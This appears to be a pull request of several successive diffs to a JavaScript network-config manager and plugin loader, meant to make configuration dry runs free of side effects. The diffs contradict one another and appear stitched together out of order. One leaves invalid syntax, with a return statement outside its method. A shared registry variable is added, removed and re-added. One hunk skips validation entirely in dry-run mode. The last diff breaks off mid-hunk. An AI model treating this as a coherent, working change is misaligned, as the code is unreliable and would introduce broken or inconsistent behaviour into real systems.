### PR TITLE
Make Network Config Dry-Run Side-Effect Free

### DIFF
--- a/core/network_config_mgr.js
+++ b/core/network_config_mgr.js
@@ -766,26 +766,28 @@ class NetworkConfigManager {
   }
 
   async tryApplyConfig(config, dryRun = false) {
-    const currentConfig = (await this.getActiveConfig()) || (await this.getDefaultConfig());
-    // convert new config to integrated AP config
-    const convertedConfig = await this.convertIntegratedAPConfig(config).catch((err) => {
-      log.error(`Failed to convert effective config`, err.message);
-      return config;
-    });
-    const errors = await ns.setup(convertedConfig, dryRun);
+  const currentConfig = (await this.getActiveConfig()) || (await this.getDefaultConfig());
+  // convert new config to integrated AP config
+  const convertedConfig = await this.convertIntegratedAPConfig(config).catch((err) => {
+  log.error(`Failed to convert effective config`, err.message);
+  return config;
+  });
+  const errors = await ns.setup(convertedConfig, dryRun);
     if (errors && errors.length != 0) {
       log.error("Failed to apply network config, rollback to previous setup", errors);
+
+    if (!dryRun) {
       // convert current config to integrated AP config
       const convertedCurrentConfig = await this.convertIntegratedAPConfig(currentConfig).catch((err) => {
-        log.error(`Failed to convert effective config`, err.message);
-        return currentConfig;
+      log.error(`Failed to convert effective config`, err.message);
+      return currentConfig;
       });
       await ns.setup(convertedCurrentConfig).catch((err) => {
-        log.error("Failed to rollback network config", err);
-      });
-    }
-    return errors;
+      log.error("Failed to rollback network config", err);
+    });
   }
+}
+return errors;
 
   async convertIntegratedAPConfig(config) {
     if (!platform.isWLANManagedByAPC()) {

--- a/core/network_config_mgr.js
+++ b/core/network_config_mgr.js
@@ -766,29 +766,36 @@ class NetworkConfigManager {
   }
 
   async tryApplyConfig(config, dryRun = false) {
-  const currentConfig = (await this.getActiveConfig()) || (await this.getDefaultConfig());
-  // convert new config to integrated AP config
-  const convertedConfig = await this.convertIntegratedAPConfig(config).catch((err) => {
-  log.error(`Failed to convert effective config`, err.message);
-  return config;
-  });
-  const errors = await ns.setup(convertedConfig, dryRun);
-    if (errors && errors.length != 0) {
-      log.error("Failed to apply network config, rollback to previous setup", errors);
+    const currentConfig = (await this.getActiveConfig()) || (await this.getDefaultConfig());
 
-    if (!dryRun) {
-      // convert current config to integrated AP config
-      const convertedCurrentConfig = await this.convertIntegratedAPConfig(currentConfig).catch((err) => {
+    // convert new config to integrated AP config
+    const convertedConfig = await this.convertIntegratedAPConfig(config).catch((err) => {
       log.error(`Failed to convert effective config`, err.message);
-      return currentConfig;
-      });
-      await ns.setup(convertedCurrentConfig).catch((err) => {
-      log.error("Failed to rollback network config", err);
-      });
+      return config;
+    });
+
+    const errors = await ns.setup(convertedConfig, dryRun);
+
+    if (errors && errors.length != 0) {
+      if (dryRun) {
+        log.error("Failed to validate network config", errors);
+      } else {
+        log.error("Failed to apply network config, rollback to previous setup", errors);
+
+        // convert current config to integrated AP config
+        const convertedCurrentConfig = await this.convertIntegratedAPConfig(currentConfig).catch((err) => {
+          log.error(`Failed to convert effective config`, err.message);
+          return currentConfig;
+        });
+
+        await ns.setup(convertedCurrentConfig).catch((err) => {
+          log.error("Failed to rollback network config", err);
+        });
+      }
     }
-  }
+
     return errors;
-}
+  }
 
   async convertIntegratedAPConfig(config) {
     if (!platform.isWLANManagedByAPC()) {

--- a/core/network_config_mgr.js
+++ b/core/network_config_mgr.js
@@ -784,10 +784,11 @@ class NetworkConfigManager {
       });
       await ns.setup(convertedCurrentConfig).catch((err) => {
       log.error("Failed to rollback network config", err);
-    });
+      });
+    }
   }
+    return errors;
 }
-return errors;
 
   async convertIntegratedAPConfig(config) {
     if (!platform.isWLANManagedByAPC()) {

--- a/core/network_setup.js
+++ b/core/network_setup.js
@@ -91,7 +91,9 @@ class NetworkSetup {
     const errors = await pl.reapply(config, dryRun);
     await this.post_setup(dryRun);
     // no need to await
-    this.booting_finish();
+    if (!dryRun) {
+      this.booting_finish();
+    }
     return errors;
   }
 

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -21,7 +21,6 @@ const Message = require('../core/Message.js');
 let pluginConfs = [];
 
 let pluginCategoryMap = {};
-let activePluginCategoryMap = pluginCategoryMap;
 let scheduledReapplyTask = null;
 let restartRsyslogTask = null;
 const _ = require('lodash');
@@ -66,25 +65,19 @@ async function initPlugins() {
   log.info("Plugin initialized", pluginConfs);
 }
 
-function createPluginInstance(
-  category,
-  name,
-  constructor,
-  config = null,
-  pluginMap = pluginCategoryMap
-) {
-  let instance = pluginMap[category] && pluginMap[category][name];
+function createPluginInstance(category, name, constructor, config = null, categoryMap = pluginCategoryMap) {
+  let instance = categoryMap[category] && categoryMap[category][name];
   if (instance)
     return instance;
 
-  if (!pluginMap[category])
-    pluginMap[category] = {};
+  if (!categoryMap[category])
+    categoryMap[category] = {};
 
   if (!constructor)
     return null;
   instance = new constructor(name);
   instance.name = name;
-  pluginMap[category][name] = instance;
+  categoryMap[category][name] = instance;
 
   if (config) {
     instance.init(config);
@@ -94,13 +87,39 @@ function createPluginInstance(
   return instance;
 }
 
+function createDryRunPluginCategoryMap() {
+  const workingPluginCategoryMap = {};
+
+  for (const category of Object.keys(pluginCategoryMap)) {
+    workingPluginCategoryMap[category] = {};
+
+    for (const name of Object.keys(pluginCategoryMap[category] || {})) {
+      const liveInstance = pluginCategoryMap[category][name];
+      if (!liveInstance)
+        continue;
+
+      const candidateInstance = Object.create(
+        Object.getPrototypeOf(liveInstance)
+      );
+
+      Object.assign(
+        candidateInstance,
+        _.cloneDeep(liveInstance)
+      );
+
+      workingPluginCategoryMap[category][name] = candidateInstance;
+    }
+  }
+
+  return workingPluginCategoryMap;
+}
+
 function getPluginInstances(category) {
-  return activePluginCategoryMap[category];
+  return pluginCategoryMap[category];
 }
 
 function getPluginInstance(category, name) {
-  return activePluginCategoryMap[category] &&
-    activePluginCategoryMap[category][name];
+  return pluginCategoryMap[category] && pluginCategoryMap[category][name];
 }
 
 function _isConfigEqual(c1, c2) {
@@ -175,250 +194,29 @@ async function reapply(config, dryRun = false) {
     applyInProgress = true;
     const errors = [];
     const country = _.get(config, ['apc', 'globalSysConfig', 'country']);
-    const wlanReloaded = await platform.prepareWLANRegDomainChange(country).catch((err) => {
-      log.error(`Failed to prepare WLAN reg domain change for country ${country}`, err);
-      errors.push(err.message || err);
-      return false;
-    });
+
+    let wlanReloaded = false;
+    if (!dryRun) {
+      wlanReloaded = await platform.prepareWLANRegDomainChange(country).catch((err) => {
+        log.error(`Failed to prepare WLAN reg domain change for country ${country}`, err);
+        errors.push(err.message || err);
+        return false;
+      });
+    }
 
     let newPluginCategoryMap = {};
-    const reversedPluginConfs = [...pluginConfs].reverse();
+    const workingPluginCategoryMap = dryRun
+      ? createDryRunPluginCategoryMap()
+      : pluginCategoryMap;
+    const reversedPluginConfs = pluginConfs.slice().reverse();
 
-    // Dry-run candidates must never share the live plugin registry.
-    const workingPluginCategoryMap = dryRun ? {} : pluginCategoryMap;
-    const previousActivePluginCategoryMap = activePluginCategoryMap;
-    activePluginCategoryMap = workingPluginCategoryMap;
-
-    try {
-      // if config is not set, simply reapply effective config
-      if (config) {
-        // remove plugins in descending order by init sequence
-        const remove = async (instance, pluginConf) => {
-          if (!dryRun) {
-            log.info(`Removing plugin ${pluginConf.category}-->${instance.name} ...`);
-            await instance.flush();
-            if (pluginConf.category === "apc") {
-              CHANGE_FLAGS |= FLAG_APC_CHANGE;
-            } else {
-              CHANGE_FLAGS |= FLAG_CHANGE;
-              if (pluginConf.category === "interface")
-                CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
-            }
-          }
-
-          instance.propagateConfigChanged(Plugin.CHANGE_FULL);
-          instance.unsubscribeAllChanges();
-          const instances = workingPluginCategoryMap[pluginConf.category];
-          if (instances)
-            delete instances[instance.name];
-        };
-
-        for (let pluginConf of reversedPluginConfs) {
-          const concurrent = pluginConf.allow_concurrent;
-
-          newPluginCategoryMap[pluginConf.category] =
-            newPluginCategoryMap[pluginConf.category] || {};
-
-          if (!pluginConf.c)
-            continue;
-
-          const existingInstances =
-            workingPluginCategoryMap[pluginConf.category] || {};
-          const instances = Object.values(existingInstances)
-            .filter(i => i.constructor.name === pluginConf.c.name);
-
-          for (let instance of instances) {
-            instance._mark = 0;
-          }
-
-          const newInstances = {};
-          const keys = pluginConf.config_path.split(".");
-          let value = config;
-          for (let key of keys) {
-            if (value)
-              value = value[key];
-          }
-
-          if (value) {
-            for (let name in value) {
-              const instance = createPluginInstance(
-                pluginConf.category,
-                name,
-                pluginConf.c,
-                pluginConf.config,
-                workingPluginCategoryMap
-              );
-
-              if (!instance)
-                continue;
-
-              instance._mark = 1;
-
-              const oldConfig = instance.networkConfig;
-              if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
-                log.info(
-                  `Network config of ${pluginConf.category}-->${name} changed`,
-                  pluginConf.hide_config_in_log ? "hidden" : oldConfig,
-                  pluginConf.hide_config_in_log ? "hidden" : value[name]
-                );
-
-                const changeType = instance.getConfigChangeType(value[name]);
-                instance.propagateConfigChanged(changeType);
-              }
-
-              // Dry-run must never expose the caller-owned configuration object
-              // to plugin lifecycle methods because configure() may mutate it.
-              instance._nextConfig = dryRun
-                ? _.cloneDeep(value[name])
-                : value[name];
-
-              if (!oldConfig) {
-                // initialization of network config, flush instance with new config
-                log.info(
-                  `Initial setup of ${pluginConf.category}-->${name}`,
-                  pluginConf.hide_config_in_log ? "hidden" : value[name]
-                );
-
-                instance.propagateConfigChanged(Plugin.CHANGE_FULL);
-                instance.unsubscribeAllChanges();
-              }
-
-              if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
-                instance.propagateConfigChanged(Plugin.CHANGE_FULL);
-              }
-
-              newInstances[name] = instance;
-            }
-          }
-
-          if (instances) {
-            const removedInstances = instances.filter(i => i._mark == 0);
-            const promises = [];
-            for (let instance of removedInstances) {
-              if (concurrent) {
-                promises.push(remove(instance, pluginConf));
-              } else {
-                await remove(instance, pluginConf);
-              }
-            }
-
-            if (concurrent && !_.isEmpty(promises)) {
-              if (!dryRun)
-                log.info(
-                  `Removing ${removedInstances.length} instances of ${pluginConf.category} in concurrent mode`
-                );
-              await Promise.all(promises);
-            }
-          }
-
-          // merge with new pluginCategoryMap
-          newPluginCategoryMap[pluginConf.category] = Object.assign(
-            {},
-            newPluginCategoryMap[pluginConf.category],
-            newInstances
-          );
-        }
-      } else {
-        newPluginCategoryMap = pluginCategoryMap;
-      }
-
-      const flush = async (instance, pluginConf) => {
-        if (!instance.networkConfig) // newly created instance
-          instance.configure(instance._nextConfig);
-
-        if (instance.isReapplyNeeded()) {
-          if (!dryRun) {
-            if (instance.isFlushNeeded(instance._nextConfig)) {
-              if (instance.isFullFlushNeeded(instance._nextConfig)) {
-                log.info("Flushing old config", pluginConf.category, instance.name);
-                await instance.flush();
-              } else {
-                log.info("Fast flushing old config", pluginConf.category, instance.name);
-                await instance.flushFast();
-              }
-            } else {
-              log.info(
-                "No need to flush old config",
-                pluginConf.category,
-                instance.name
-              );
-            }
-
-            if (pluginConf.category === "apc") {
-              CHANGE_FLAGS |= FLAG_APC_CHANGE;
-            } else {
-              CHANGE_FLAGS |= FLAG_CHANGE;
-              if (pluginConf.category === "interface")
-                CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
-            }
-          }
-
-          instance.unsubscribeAllChanges();
-        }
-
-        if (config) {
-          // do not change config if config is not set
-          instance.configure(instance._nextConfig);
-        }
-      };
-
-      // flush all changed plugins in descending order by init sequence
-      for (let pluginConf of reversedPluginConfs) {
-        const instances = Object.values(
-          newPluginCategoryMap[pluginConf.category]
-        ).filter(i => i.constructor.name === pluginConf.c.name);
-
-        const concurrent = pluginConf.allow_concurrent;
-
-        if (instances) {
-          const promises = [];
-          for (let instance of instances) {
-            if (concurrent) {
-              promises.push(flush(instance, pluginConf));
-            } else {
-              await flush(instance, pluginConf);
-            }
-          }
-
-          if (concurrent && !_.isEmpty(promises)) {
-            if (!dryRun)
-              log.info(
-                `Flushing instances of ${pluginConf.category} in concurrent mode`
-              );
-
-            await Promise.all(promises);
-          }
-        }
-      }
-
-      // apply plugin configs in ascending order by init sequence
-      if (!dryRun)
-        pluginConfs = reversedPluginConfs.reverse();
-
-      // do not apply config in dry run
-      if (dryRun) {
-        applyInProgress = false;
-        lastAppliedTimestamp = Date.now() / 1000;
-        return errors;
-      }
-
-      const apply = async (instance, pluginConf) => {
-        if (instance.isReapplyNeeded()) {
-          log.info(
-            "Applying new config",
-            pluginConf.category,
-            instance.name
-          );
-          await instance.apply().catch((err) => {
-            log.error(
-              `Failed to apply config of ${pluginConf.category}-->${instance.name}`,
-              instance.networkConfig,
-              err
-            );
-
-            errors.push(err.message || err);
-          });
-
+    // if config is not set, simply reapply effective config
+    if (config) {
+      // remove plugins in descending order by init sequence
+      const remove = async (instance, pluginConf) => {
+        if (!dryRun) {
+          log.info(`Removing plugin ${pluginConf.category}-->${instance.name} ...`);
+          await instance.flush();
           if (pluginConf.category === "apc") {
             CHANGE_FLAGS |= FLAG_APC_CHANGE;
           } else {
@@ -426,63 +224,272 @@ async function reapply(config, dryRun = false) {
             if (pluginConf.category === "interface")
               CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
           }
-        } else {
-          log.info(
-            "Instance config is not changed. No need to apply config",
-            pluginConf.category,
-            instance.name
-          );
         }
 
-        instance.propagateConfigChanged(Plugin.CHANGE_NONE);
+        instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+        instance.unsubscribeAllChanges();
+        workingPluginCategoryMap &&
+          workingPluginCategoryMap[pluginConf.category] &&
+          delete workingPluginCategoryMap[pluginConf.category][instance.name];
       };
 
-      for (let pluginConf of pluginConfs) {
+      for (let pluginConf of reversedPluginConfs) {
         const concurrent = pluginConf.allow_concurrent;
 
+        newPluginCategoryMap[pluginConf.category] =
+          newPluginCategoryMap[pluginConf.category] || {};
+
+        if (!pluginConf.c)
+          continue;
         const instances = Object.values(
-          newPluginCategoryMap[pluginConf.category]
+          workingPluginCategoryMap[pluginConf.category] || {}
         ).filter(i => i.constructor.name === pluginConf.c.name);
 
         if (instances) {
-          const promises = [];
           for (let instance of instances) {
+            instance._mark = 0;
+          }
+        } else {
+          workingPluginCategoryMap[pluginConf.category] = {};
+        }
+
+        const newInstances = {};
+        const keys = pluginConf.config_path.split(".");
+        let value = config;
+        for (let key of keys) {
+          if (value)
+            value = value[key];
+        }
+
+        if (value) {
+          for (let name in value) {
+            const instance = createPluginInstance(
+              pluginConf.category,
+              name,
+              pluginConf.c,
+              pluginConf.config,
+              workingPluginCategoryMap
+            );
+
+            if (!instance)
+              continue;
+
+            instance._mark = 1;
+
+            const oldConfig = instance.networkConfig;
+            if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
+              log.info(
+                `Network config of ${pluginConf.category}-->${name} changed`,
+                pluginConf.hide_config_in_log ? "hidden" : oldConfig,
+                pluginConf.hide_config_in_log ? "hidden" : value[name]
+              );
+
+              const changeType = instance.getConfigChangeType(value[name]);
+              instance.propagateConfigChanged(changeType);
+            }
+            // Dry-run must never expose the caller-owned configuration object
+            // to plugin lifecycle methods because configure() may mutate it.
+            instance._nextConfig = dryRun
+              ? _.cloneDeep(value[name])
+              : value[name];
+            if (!oldConfig) {
+              // initialization of network config, flush instance with new config
+              log.info(
+                `Initial setup of ${pluginConf.category}-->${name}`,
+                pluginConf.hide_config_in_log ? "hidden" : value[name]
+              );
+
+              instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+              instance.unsubscribeAllChanges();
+            }
+            if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
+              instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+            }
+
+            newInstances[name] = instance;
+          }
+        }
+
+        if (instances) {
+          const removedInstances = instances.filter(i => i._mark == 0);
+          const promises = [];
+          for (let instance of removedInstances) {
             if (concurrent) {
-              promises.push(apply(instance, pluginConf));
+              promises.push(remove(instance, pluginConf));
             } else {
-              await apply(instance, pluginConf);
+              await remove(instance, pluginConf);
             }
           }
 
           if (concurrent && !_.isEmpty(promises)) {
-            log.info(
-              `Applying instances of ${pluginConf.category} in concurrent mode`
-            );
-
+            if (!dryRun)
+              log.info(
+                `Removing ${removedInstances.length} instances of ${pluginConf.category} in concurrent mode`
+              );
             await Promise.all(promises);
           }
         }
+
+        // merge with new pluginCategoryMap
+        newPluginCategoryMap[pluginConf.category] = Object.assign(
+          {},
+          newPluginCategoryMap[pluginConf.category],
+          newInstances
+        );
+      }
+    } else {
+      newPluginCategoryMap = pluginCategoryMap;
+    }
+    const flush = async (instance, pluginConf) => {
+      if (!instance.networkConfig) // newly created instance
+        instance.configure(instance._nextConfig);
+      if (instance.isReapplyNeeded()) {
+        if (!dryRun) {
+          if (instance.isFlushNeeded(instance._nextConfig)) {
+            if (instance.isFullFlushNeeded(instance._nextConfig)) {
+              log.info("Flushing old config", pluginConf.category, instance.name);
+              await instance.flush();
+            } else {
+              log.info("Fast flushing old config", pluginConf.category, instance.name);
+              await instance.flushFast();
+            }
+          } else {
+            log.info(
+              "No need to flush old config",
+              pluginConf.category,
+              instance.name
+            );
+          }
+          if (pluginConf.category === "apc") {
+            CHANGE_FLAGS |= FLAG_APC_CHANGE;
+          } else {
+            CHANGE_FLAGS |= FLAG_CHANGE;
+            if (pluginConf.category === "interface")
+              CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+          }
+        }
+
+        instance.unsubscribeAllChanges();
       }
 
-      pluginCategoryMap = newPluginCategoryMap;
+      if (config) {
+        // do not change config if config is not set
+        instance.configure(instance._nextConfig);
+      }
+    };
+    // flush all changed plugins in descending order by init sequence
+    for (let pluginConf of reversedPluginConfs) {
+      const instances = Object.values(
+        newPluginCategoryMap[pluginConf.category]
+      ).filter(i => i.constructor.name === pluginConf.c.name);
+
+      const concurrent = pluginConf.allow_concurrent;
+
+      if (instances) {
+        const promises = [];
+        for (let instance of instances) {
+          if (concurrent) {
+            promises.push(flush(instance, pluginConf));
+          } else {
+            await flush(instance, pluginConf);
+          }
+        }
+
+        if (concurrent && !_.isEmpty(promises)) {
+          if (!dryRun)
+            log.info(
+              `Flushing instances of ${pluginConf.category} in concurrent mode`
+            );
+
+          await Promise.all(promises);
+        }
+      }
+    }
+    // apply plugin configs in ascending order by init sequence
+    pluginConfs = reversedPluginConfs.slice();
+
+    // do not apply config in dry run
+    if (dryRun) {
       applyInProgress = false;
-
-      // clear applyInProgress so that subsequent publish functions will send message to redis immediately
-      if (CHANGE_FLAGS & FLAG_CHANGE)
-        await publishChangeApplied();
-
-      if (CHANGE_FLAGS & FLAG_IFACE_CHANGE)
-        await publishIfaceChangeApplied();
-
-      if (CHANGE_FLAGS & FLAG_APC_CHANGE)
-        await publishAPCChangeApplied();
-
-      CHANGE_FLAGS = 0;
       lastAppliedTimestamp = Date.now() / 1000;
       return errors;
-    } finally {
-      activePluginCategoryMap = pluginCategoryMap || previousActivePluginCategoryMap;
     }
+
+    const apply = async (instance, pluginConf) => {
+      if (instance.isReapplyNeeded()) {
+        log.info(
+          "Applying new config",
+          pluginConf.category,
+          instance.name
+        );
+        await instance.apply().catch((err) => {
+          log.error(
+            `Failed to apply config of ${pluginConf.category}-->${instance.name}`,
+            instance.networkConfig,
+            err
+          );
+
+          errors.push(err.message || err);
+        });
+        if (pluginConf.category === "apc") {
+          CHANGE_FLAGS |= FLAG_APC_CHANGE;
+        } else {
+          CHANGE_FLAGS |= FLAG_CHANGE;
+          if (pluginConf.category === "interface")
+            CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+        }
+      } else {
+        log.info(
+          "Instance config is not changed. No need to apply config",
+          pluginConf.category,
+          instance.name
+        );
+      }
+
+      instance.propagateConfigChanged(Plugin.CHANGE_NONE);
+    };
+    for (let pluginConf of pluginConfs) {
+      const concurrent = pluginConf.allow_concurrent;
+
+      const instances = Object.values(
+        newPluginCategoryMap[pluginConf.category]
+      ).filter(i => i.constructor.name === pluginConf.c.name);
+
+      if (instances) {
+        const promises = [];
+        for (let instance of instances) {
+          if (concurrent) {
+            promises.push(apply(instance, pluginConf));
+          } else {
+            await apply(instance, pluginConf);
+          }
+        }
+
+        if (concurrent && !_.isEmpty(promises)) {
+          log.info(
+            `Applying instances of ${pluginConf.category} in concurrent mode`
+          );
+
+          await Promise.all(promises);
+        }
+      }
+    }
+    pluginCategoryMap = newPluginCategoryMap;
+    applyInProgress = false;
+
+    // clear applyInProgress so that subsequent publish functions will send message to redis immediately
+    if (CHANGE_FLAGS & FLAG_CHANGE)
+      await publishChangeApplied();
+
+    if (CHANGE_FLAGS & FLAG_IFACE_CHANGE)
+      await publishIfaceChangeApplied();
+
+    if (CHANGE_FLAGS & FLAG_APC_CHANGE)
+      await publishAPCChangeApplied();
+
+    CHANGE_FLAGS = 0;
+    lastAppliedTimestamp = Date.now() / 1000;
+    return errors;
   }).then((errors) => {
     applyInProgress = false;
     lastAppliedTimestamp = Date.now() / 1000;
@@ -499,7 +506,6 @@ async function reapply(config, dryRun = false) {
     return [err.message];
   });
 }
-
 function __getTestStateForTest() {
   return {
     pluginConfs: pluginConfs,
@@ -513,7 +519,6 @@ function __setPluginConfsForTest(confs) {
 
 function __setPluginCategoryMapForTest(categoryMap) {
   pluginCategoryMap = categoryMap;
-  activePluginCategoryMap = categoryMap;
 }
 
 function scheduleReapply() {
@@ -525,7 +530,6 @@ function scheduleReapply() {
     scheduledReapplyTask.refresh();
   }
 }
-
 function scheduleRestartRsyslog() {
   if (restartRsyslogTask)
     clearTimeout(restartRsyslogTask);
@@ -536,7 +540,6 @@ function scheduleRestartRsyslog() {
     });
   }, 5000);
 }
-
 module.exports = {
   initPlugins: initPlugins,
   getPluginInstance: getPluginInstance,

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -72,20 +72,20 @@ async function initPlugins() {
   log.info("Plugin initialized", pluginConfs);
 }
 
-function createPluginInstance(category, name, constructor, config = null) {
-  let instance = pluginCategoryMap[category] && pluginCategoryMap[category][name];
+function createPluginInstance(category, name, constructor, config = null, pluginMap = pluginCategoryMap) {
+  let instance = pluginMap[category] && pluginMap[category][name];
   if (instance)
     return instance;
 
-  if (!pluginCategoryMap[category])
-    pluginCategoryMap[category] = {};
+  if (!pluginMap[category])
+    pluginMap[category] = {};
 
   if (!constructor)
     return null;
 
   instance = new constructor(name);
   instance.name = name;
-  pluginCategoryMap[category][name] = instance;
+  pluginMap[category][name] = instance;
   if (config) {
     instance.init(config);
   }

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -240,6 +240,12 @@ async function reapply(config, dryRun = false) {
       return false;
     });
 
+    if (dryRun) {
+      applyInProgress = false;
+      lastAppliedTimestamp = Date.now() / 1000;
+      return errors;
+    }
+
     let newPluginCategoryMap = {};
     const reversedPluginConfs = pluginConfs.reverse();
     // if config is not set, simply reapply effective config

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -21,6 +21,7 @@ const Message = require('../core/Message.js');
 let pluginConfs = [];
 
 let pluginCategoryMap = {};
+let activePluginCategoryMap = pluginCategoryMap;
 let scheduledReapplyTask = null;
 let restartRsyslogTask = null;
 const _ = require('lodash');
@@ -94,11 +95,12 @@ function createPluginInstance(
 }
 
 function getPluginInstances(category) {
-  return pluginCategoryMap[category];
+  return activePluginCategoryMap[category];
 }
 
 function getPluginInstance(category, name) {
-  return pluginCategoryMap[category] && pluginCategoryMap[category][name];
+  return activePluginCategoryMap[category] &&
+    activePluginCategoryMap[category][name];
 }
 
 function _isConfigEqual(c1, c2) {
@@ -182,162 +184,240 @@ async function reapply(config, dryRun = false) {
     let newPluginCategoryMap = {};
     const reversedPluginConfs = [...pluginConfs].reverse();
 
-    // if config is not set, simply reapply effective config
-    if (config) {
-      // remove plugins in descending order by init sequence
-      const remove = async (instance, pluginConf) => {
-        if (!dryRun) {
-          log.info(`Removing plugin ${pluginConf.category}-->${instance.name} ...`);
-          await instance.flush();
-          if (pluginConf.category === "apc") {
-            CHANGE_FLAGS |= FLAG_APC_CHANGE;
-          } else {
-            CHANGE_FLAGS |= FLAG_CHANGE;
-            if (pluginConf.category === "interface")
-              CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+    // Dry-run candidates must never share the live plugin registry.
+    const workingPluginCategoryMap = dryRun ? {} : pluginCategoryMap;
+    const previousActivePluginCategoryMap = activePluginCategoryMap;
+    activePluginCategoryMap = workingPluginCategoryMap;
+
+    try {
+      // if config is not set, simply reapply effective config
+      if (config) {
+        // remove plugins in descending order by init sequence
+        const remove = async (instance, pluginConf) => {
+          if (!dryRun) {
+            log.info(`Removing plugin ${pluginConf.category}-->${instance.name} ...`);
+            await instance.flush();
+            if (pluginConf.category === "apc") {
+              CHANGE_FLAGS |= FLAG_APC_CHANGE;
+            } else {
+              CHANGE_FLAGS |= FLAG_CHANGE;
+              if (pluginConf.category === "interface")
+                CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+            }
           }
+
+          instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+          instance.unsubscribeAllChanges();
+          const instances = workingPluginCategoryMap[pluginConf.category];
+          if (instances)
+            delete instances[instance.name];
+        };
+
+        for (let pluginConf of reversedPluginConfs) {
+          const concurrent = pluginConf.allow_concurrent;
+
+          newPluginCategoryMap[pluginConf.category] =
+            newPluginCategoryMap[pluginConf.category] || {};
+
+          if (!pluginConf.c)
+            continue;
+
+          const existingInstances =
+            workingPluginCategoryMap[pluginConf.category] || {};
+          const instances = Object.values(existingInstances)
+            .filter(i => i.constructor.name === pluginConf.c.name);
+
+          for (let instance of instances) {
+            instance._mark = 0;
+          }
+
+          const newInstances = {};
+          const keys = pluginConf.config_path.split(".");
+          let value = config;
+          for (let key of keys) {
+            if (value)
+              value = value[key];
+          }
+
+          if (value) {
+            for (let name in value) {
+              const instance = createPluginInstance(
+                pluginConf.category,
+                name,
+                pluginConf.c,
+                pluginConf.config,
+                workingPluginCategoryMap
+              );
+
+              if (!instance)
+                continue;
+
+              instance._mark = 1;
+
+              const oldConfig = instance.networkConfig;
+              if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
+                log.info(
+                  `Network config of ${pluginConf.category}-->${name} changed`,
+                  pluginConf.hide_config_in_log ? "hidden" : oldConfig,
+                  pluginConf.hide_config_in_log ? "hidden" : value[name]
+                );
+
+                const changeType = instance.getConfigChangeType(value[name]);
+                instance.propagateConfigChanged(changeType);
+              }
+
+              // Dry-run must never expose the caller-owned configuration object
+              // to plugin lifecycle methods because configure() may mutate it.
+              instance._nextConfig = dryRun
+                ? _.cloneDeep(value[name])
+                : value[name];
+
+              if (!oldConfig) {
+                // initialization of network config, flush instance with new config
+                log.info(
+                  `Initial setup of ${pluginConf.category}-->${name}`,
+                  pluginConf.hide_config_in_log ? "hidden" : value[name]
+                );
+
+                instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+                instance.unsubscribeAllChanges();
+              }
+
+              if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
+                instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+              }
+
+              newInstances[name] = instance;
+            }
+          }
+
+          if (instances) {
+            const removedInstances = instances.filter(i => i._mark == 0);
+            const promises = [];
+            for (let instance of removedInstances) {
+              if (concurrent) {
+                promises.push(remove(instance, pluginConf));
+              } else {
+                await remove(instance, pluginConf);
+              }
+            }
+
+            if (concurrent && !_.isEmpty(promises)) {
+              if (!dryRun)
+                log.info(
+                  `Removing ${removedInstances.length} instances of ${pluginConf.category} in concurrent mode`
+                );
+              await Promise.all(promises);
+            }
+          }
+
+          // merge with new pluginCategoryMap
+          newPluginCategoryMap[pluginConf.category] = Object.assign(
+            {},
+            newPluginCategoryMap[pluginConf.category],
+            newInstances
+          );
+        }
+      } else {
+        newPluginCategoryMap = pluginCategoryMap;
+      }
+
+      const flush = async (instance, pluginConf) => {
+        if (!instance.networkConfig) // newly created instance
+          instance.configure(instance._nextConfig);
+
+        if (instance.isReapplyNeeded()) {
+          if (!dryRun) {
+            if (instance.isFlushNeeded(instance._nextConfig)) {
+              if (instance.isFullFlushNeeded(instance._nextConfig)) {
+                log.info("Flushing old config", pluginConf.category, instance.name);
+                await instance.flush();
+              } else {
+                log.info("Fast flushing old config", pluginConf.category, instance.name);
+                await instance.flushFast();
+              }
+            } else {
+              log.info(
+                "No need to flush old config",
+                pluginConf.category,
+                instance.name
+              );
+            }
+
+            if (pluginConf.category === "apc") {
+              CHANGE_FLAGS |= FLAG_APC_CHANGE;
+            } else {
+              CHANGE_FLAGS |= FLAG_CHANGE;
+              if (pluginConf.category === "interface")
+                CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+            }
+          }
+
+          instance.unsubscribeAllChanges();
         }
 
-        instance.propagateConfigChanged(Plugin.CHANGE_FULL);
-        instance.unsubscribeAllChanges();
-        const instances = workingPluginCategoryMap[pluginConf.category];
-        if (instances)
-          delete instances[instance.name];
+        if (config) {
+          // do not change config if config is not set
+          instance.configure(instance._nextConfig);
+        }
       };
 
-      // Dry-run candidates must never share the live plugin registry.
-      const workingPluginCategoryMap = dryRun ? {} : pluginCategoryMap;
-
+      // flush all changed plugins in descending order by init sequence
       for (let pluginConf of reversedPluginConfs) {
+        const instances = Object.values(
+          newPluginCategoryMap[pluginConf.category]
+        ).filter(i => i.constructor.name === pluginConf.c.name);
+
         const concurrent = pluginConf.allow_concurrent;
 
-        newPluginCategoryMap[pluginConf.category] =
-          newPluginCategoryMap[pluginConf.category] || {};
-
-        if (!pluginConf.c)
-          continue;
-
-        const existingInstances =
-          workingPluginCategoryMap[pluginConf.category] || {};
-        const instances = Object.values(existingInstances)
-          .filter(i => i.constructor.name === pluginConf.c.name);
-
-        for (let instance of instances) {
-          instance._mark = 0;
-        }
-
-        const newInstances = {};
-        const keys = pluginConf.config_path.split(".");
-        let value = config;
